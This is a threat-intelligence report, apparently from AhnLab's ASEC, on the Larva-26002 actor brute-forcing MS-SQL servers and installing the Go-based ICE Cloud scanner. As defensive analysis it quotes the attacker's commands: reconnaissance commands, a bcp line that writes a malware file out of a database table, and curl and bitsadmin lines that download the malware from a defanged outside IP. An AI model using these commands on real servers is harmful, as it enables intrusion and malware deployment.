Attack Targeting MS‑SQL Servers to Deploy the ICE Cloud Scanner (Larva-26002)
AhnLab SEcurity intelligence Center (ASEC) has confirmed that the Larva-26002 threat actor continues to target improperly managed MS-SQL servers in 2026. The Larva-26002 threat actor has distributed Trigona and Mimic ransomware in the past, and has since seized control of infected systems and installed scanners. The latest confirmed attack utilizes the ICE Cloud Client, a scanner malware written in Go language.
In January 2024, the Larva-26002 threat actor attacked MS-SQL servers to install the Trigona and Mimic ransomware [1]. The email address used in the Mimic ransomware is not known from other attack cases, but the email address used in the Trigona ransomware matched the email address covered by Palo Alto [2] and Zscaler [3]. The attack was characterized by the exploitation of the Bulk Copy Program (BCP) utility of MS-SQL servers. The threat actor also installed AnyDesk for remote control and a port forwarder for RDP connections. The same threat actor continued the attack in 2025, but in addition to AnyDesk, he used Teramind, an RMM tool, and a scanner built in Rust. [4]
In 2026, the attacker attacked the same improperly managed MS-SQL server as in the previous case, exploited BCP to create malware, and finally installed the scanner malware. However, it is characterized by the use of a scanner named ICE Cloud, which is built in the Go language, and the strings used in ICE Cloud are Turkish, which is also known to have been used by threat actors in the past Mimic ransomware attack. [5]
1. Attacks Against MS-SQL Servers
Larva-26002 attacks MS-SQL servers that are exposed to the outside world and are vulnerable to brute force attacks or dictionary attacks by setting up simple account information. After a successful attack, it uses the following commands to collect information about the infected system.
> hostname
> whoami
> ifconfig
> ifconfig /all
> netstat -an
> tasklist
> tasklist /FI “IMAGENAME eq sqlservr.exe” /FO CSV /NH
Next, it uses the BCP utility to create malware. For reference, the BCP utility, bcp.exe, is a command line tool used to import or export large amounts of external data from MS-SQL servers. It is typically used to save large amounts of data stored in a table on a SQL server to a file locally or to export a locally stored data file to a table on a SQL server.
The threat actor stored the malware in the database and then used BCP to create a file locally. In other words, the threat actor exported the malware from the table “uGnzBdZbsi” to the local path using the command as follows, and “FODsOZKgAU.txt” is a format file that contains formatting information. Note that both “uGnzBdZbsi” and “FODsOZKgAU.txt” are keywords that have been consistently used since the 2024 attack case.
> bcp “select binaryTable from uGnzBdZbsi” queryout “C:\ProgramData\api.exe” -T -f “C:\ProgramData\FODsOZKgAU.txt”
Figure 1. Malware creation exploiting the BCP utility
In certain environments, instead of using BCP, the scanner malware was downloaded using Curl or Bitsadmin tools and PowerShell.
> curl -o “C:\programdata\api.exe” “hxxp://109.205.211[.]13/api.exe”
> bitsadmin /transfer job1 /download /priority high “hxxp://109.205.211[.]13/api.exe” “C:\programdata\api.exe”
Figure 2. Scanner malware download using PowerShell
2. ICE Cloud (Scanner)
The api.exe file created through BCP, Curl, or Bitsadmin is a downloader that installs a piece of malware named ‘ICE Cloud Client.’ This malware functions as both a scanner and a brute‑force tool, is developed in Go, and is labeled ‘ICE Cloud Launcher.’ When executed with the “-show9” argument, it outputs the following execution log.
Figure 3. ICE Cloud Launcher execution log
ICE Cloud Launcher authenticates by sending the following packet to the C&C server and then sends a download request to download the scanner, “ICE Cloud Client”. The downloaded “ICE Cloud Client” is created with a random name disguising a legitimate program in the same path.
Figure 4. Authentication process with C&C server
The “ICE Cloud Client” is also written in Go language and is actually responsible for scanning the MS-SQL server. The strings contained in the binary are written in Turkish, and the emoticons used suggest that the author utilized generative AI. As for the RDP protocol, there is a simple connection test function, but the scanning command does not seem to be supported yet.
Figure 5. Turkish string and emoji
Figure 6. ICE Cloud Client execution log
After authenticating with the C&C server, the scanner proceeds with the registration process, according to which the server sends a list of addresses of pre-attack MS-SQL servers. It also sends the scanning target protocol “mssql” and ID/PW “ecomm/ecomm” along with the string “TASK”. the scanner tries to authenticate to MS-SQL with the ID/PW sent to the scanning target address and sends the successful result to the C&C server.
Figure 7. Scanning data received from C&C server
3. Conclusion
Attacks against MS-SQL servers typically include brute force attacks and dictionary attacks against systems that improperly manage account information. Administrators should protect their database servers from brute force attacks and dictionary attacks by using hard-to-guess account passwords and changing them regularly.
It is also important to update V3 to the latest version to prevent malware infection in advance. In addition, for database servers that are exposed to the internet, access must be controlled using security solutions such as firewalls to block external attackers. If these measures are not implemented beforehand, continuous infections may occur through attackers or malware.
Gain access to related IOCs and detailed analysis by subscribing to AhnLab TIP. For subscription details, click the banner below.
